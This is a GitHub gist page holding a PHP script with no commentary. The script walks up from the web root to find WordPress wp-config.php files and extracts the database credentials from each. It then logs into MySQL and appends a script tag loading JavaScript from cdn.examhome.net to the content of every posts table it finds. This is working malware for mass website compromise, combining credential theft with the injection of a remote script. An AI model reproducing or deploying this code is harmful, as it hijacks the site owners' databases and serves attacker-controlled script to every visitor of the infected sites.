Created
October 4, 2018 20:31
-
-
Save geektutor/6e1d183defedcfa02191ae8204101b25 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php echo ":#009009#:"; | |
$file_to_search = "wp-config.php"; | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search); | |
function search_file($dir,$file_to_search){ | |
$files = scandir($dir); | |
foreach($files as $key => $value){ | |
$path = realpath($dir.DIRECTORY_SEPARATOR.$value); | |
if(!is_dir($path)) { | |
if (strpos($value,$file_to_search) !== false) { | |
show_sitenames($path); | |
} | |
} else if($value != "." && $value != "..") { | |
search_file($path, $file_to_search); | |
} | |
} | |
} | |
echo ":#009009#:"; | |
function show_sitenames($file){ | |
$content = @file_get_contents($file); | |
if(strpos($content, "DB_NAME") !== false) { | |
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content); | |
// Create connection | |
$conn = new mysqli($host, $user, $pass); | |
// Check connection | |
if ($conn->connect_error) { | |
echo $conn->connect_error; | |
} else { | |
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'"; | |
$result = $conn->query($q); | |
if ($result->num_rows > 0) { | |
while($row = $result->fetch_assoc()) { | |
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; | |
$result2 = $conn->query($q2); | |
if ($result2->num_rows > 0) { | |
while($row2 = $result2->fetch_assoc()) { | |
$val = $row2['post_content']; | |
if(strpos($val, "examhome") === false){ | |
echo "nothing:".$file."\n"; | |
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'"; | |
$conn->query($q3); | |
} else { | |
echo "already exist:".$file."\n"; | |
} | |
} | |
} else { | |
} | |
} | |
} else { | |
} | |
$conn->close(); | |
} | |
} | |
} | |
function get_var_reg($pat,$text) { | |
if ($c = preg_match_all ("/".$pat."/is", $text, $matches)) | |
{ | |
return $matches[1][0]; | |
} | |
return ""; | |
} | |
exit(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment